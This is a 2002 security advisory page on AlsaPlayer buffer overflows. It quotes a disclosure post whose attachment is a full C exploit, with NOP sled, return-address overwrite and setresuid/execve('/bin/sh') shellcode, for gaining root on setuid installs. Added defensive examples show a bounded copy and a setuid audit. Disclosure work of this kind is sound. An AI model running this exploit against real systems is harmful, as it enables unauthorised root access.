SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Multimedia)  >   AlsaPlayer Vendors:   Alsaplayer.org
AlsaPlayer PCM Audio Player Buffer Overflow May Let Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1005265
SecurityTracker URL:  http://securitytracker.com/id/1005265
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 21 2002
Impact:   Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  

Description:   Several buffer overflows were reported in the AlsaPlayer PCM audio player software. A local user may be able to obtain elevated privileges.

It is reported that there are buffer overflows in the processing of file names and directory names. A local user could execute AlsaPlayer with a specially crafted command line string to trigger a buffer overflow and execute arbitrary code on the system.

According to the report, some installations of AlsaPlayer may be configured with set user id (setuid) privileges, particularly for debugging purposes. If the binary is configured with setuid privileges, the local user could gain elevated privileges on the system.
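The following is an added illustration, not AlsaPlayer's code (the project's actual fix is the Main.cpp diff linked under Solution): the unbounded copy of a command-line argument into a fixed-size stack buffer that produces this class of overflow, beside a bounded replacement that rejects oversized input. The buffer size and function names are assumptions made for the example.

```c
/* Added example, not from the advisory or from AlsaPlayer.  PATH_BUF and
 * the function names are assumptions for illustration only. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256   /* assumed fixed-size buffer for a file/directory name */

/* Vulnerable pattern: argv[] is caller-controlled and strcpy() has no bound,
 * so an argument of PATH_BUF bytes or more runs past dst into the saved
 * frame pointer and return address.  Shown for contrast; never called here. */
void set_path_unsafe(char *dst, const char *arg) {
    strcpy(dst, arg);                      /* overflow if strlen(arg) >= PATH_BUF */
}

/* Hardened form: measure first, refuse anything that does not fit including
 * its terminating NUL, and leave dst untouched on refusal.
 * Returns 0 on success, -1 if the argument was rejected. */
int set_path_safe(char *dst, size_t dst_size, const char *arg) {
    size_t n = strlen(arg);
    if (n >= dst_size)                     /* no room for the NUL terminator */
        return -1;
    memcpy(dst, arg, n + 1);               /* bounded copy, NUL included */
    return 0;
}

int main(int argc, char **argv) {
    char path[PATH_BUF] = "";
    if (argc < 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    if (set_path_safe(path, sizeof path, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", PATH_BUF - 1);
        return 1;
    }
    printf("opening %s\n", path);
    return 0;
}
```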

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can execute arbitrary code, possibly with elevated privileges (depending on the permissions of the binary).
Solution:   The vendor has released a fix in the CVS version, available at:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67

Vendor URL:  alsaplayer.org/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Alsasound local b0f (not an issue if not setuid root)



I noticed that it is very common in the troubleshooting of an 
application that uses alsa-sound to set the setuid bit on the binary in 
question. One example of this can be found in the archives of the 
alsaplayer mailing list: 
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html 
and
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html

I spoke to the developer of alsasound and he promptly fixed the 
problems. Although he does not condone the setuid bit on the alsasound 
program, the author noted that some users choose to set the bit.

The fixes for the above problem can be found at: 
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67

http://alsaplayer.org/changelog.php3

Wed Sep 18 11:52:43 CEST 2002
-----------------------------
* Code cleanups
* JACK related updates
* commandline buffer overflow fixes.
...


-KF





Attachment: alsaplayer-suid.c

/* 
 * Alsaplayer exploit for a buffer overflow found by KF (snosoft.com) 
 * 
 * This program is not installed with special permissions by default. 
 * However, the author himself does recommend to do so under certain 
 * conditions:
 *
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
 *
 * Author: zillion[at]safemode.org (09/2002)
 *
 * Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 1056        /* argument length needed to reach saved EBP/EIP */
#define NOP 0x90
#define RET 0xbfffe440          /* stack address observed on the tested system */

/* i386 Linux shellcode: setresuid(0,0,0) then execve("/bin/sh") */
char shellcode[]=

"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80" 
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68"; 

void print_error(char * burb) { 
  printf(" Error: %s !\n",burb); exit(0); 
}

void usage(char *progname) {
  printf("\n*--- -- -  Alsaplayer b0f exploit - -- ---*\n");
  printf("\nDefault: %s  -f /path/to/alsaplayer",progname);
  printf("\nOption : %s  -o <offset>\n\n",progname);
  exit(0);
}

int main(int argc, char **argv){
  
  char buffer[BUFFER_SIZE + 1];   /* +1 so the argv string is NUL-terminated */
  char file[30] = "";
  uint32_t retaddress;            /* 32-bit target: saved EIP is 4 bytes */
  int arg,offset=500;
  
  struct stat sbuf;
  
  if(argc < 2) { usage(argv[0]); }
  
  while ((arg = getopt (argc, argv, "f:o:")) != -1){ 
    switch (arg){ 
    case 'f': 
      strncpy(file,optarg,sizeof(file) - 1);   /* keep room for the NUL */
      file[sizeof(file) - 1] = '\0';
      /* stat the copied path, not argv[2], which is wrong when -o comes first */
      if(stat(file, &sbuf)) { print_error("No such file");}
      break; 
    case 'o':       
      offset = atoi(optarg);
      if(offset < 0) { print_error("Offset must be positive");}
      break; 
    default :       
      usage(argv[0]); 
    } 
  } 
  
  if(file[0] == '\0') { usage(argv[0]); }   /* -f is required */
  
  retaddress = (RET - offset);
  memset(buffer,NOP,BUFFER_SIZE);           /* NOP sled fills the whole argument */
  memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);
  
  /* Overwrite EBP and EIP (4 bytes each on i386) */
  memcpy(&buffer[BUFFER_SIZE - 8], &retaddress, sizeof(retaddress));
  memcpy(&buffer[BUFFER_SIZE - 4], &retaddress, sizeof(retaddress));
  buffer[BUFFER_SIZE] = '\0';               /* terminate the argument string */
  
  if(execl(file,file,"-p",buffer,(char *)NULL) != 0) {
    print_error("Could not execute alsaplayer ");
  }
  
  return 0;
  
}


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
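The report above turns on one precondition: the binary carrying the setuid bit. As an added example (not part of the advisory, the message, or AlsaPlayer), the following C program checks a path for that bit, reports whether it is setuid root, and demonstrates clearing it with chmod, which is the workaround the subject line describes. The path /usr/bin/alsaplayer is an assumed default.

```c
/* Added example: audit a binary for the setuid bit.  Not from the advisory
 * or from AlsaPlayer; the default path below is an assumption. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Returns 1 if path has the setuid bit, 0 if not, -1 if stat() fails. */
int has_setuid_bit(const char *path) {
    struct stat sb;
    if (stat(path, &sb) != 0)
        return -1;
    return (sb.st_mode & S_ISUID) ? 1 : 0;
}

/* Returns 1 if path is setuid AND owned by uid 0, the case in the report;
 * a setuid binary owned by another user still grants that user's rights. */
int is_setuid_root(const char *path) {
    struct stat sb;
    if (stat(path, &sb) != 0)
        return -1;
    return ((sb.st_mode & S_ISUID) && sb.st_uid == 0) ? 1 : 0;
}

/* Self-contained round trip on a constructed temp file: set mode 4755,
 * confirm the bit is detected, clear it (the effect of chmod u-s), confirm
 * it is gone.  Returns 0 when every step behaves as expected. */
int demo_setuid_roundtrip(void) {
    char tmpl[] = "/tmp/setuid-demo-XXXXXX";   /* constructed sample file */
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    close(fd);
    int result = -1;
    if (chmod(tmpl, 04755) == 0 && has_setuid_bit(tmpl) == 1 &&
        chmod(tmpl, 0755) == 0 && has_setuid_bit(tmpl) == 0)
        result = 0;
    unlink(tmpl);
    return result;
}

int main(int argc, char **argv) {
    const char *p = argc > 1 ? argv[1] : "/usr/bin/alsaplayer"; /* assumed path */
    int r = is_setuid_root(p);
    if (r < 0) { perror(p); return 1; }
    printf("%s: %s\n", p, r ? "setuid root - clear it with chmod u-s"
                            : "not setuid root");
    return 0;
}
```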

Copyright 2021, SecurityGlobal.net LLC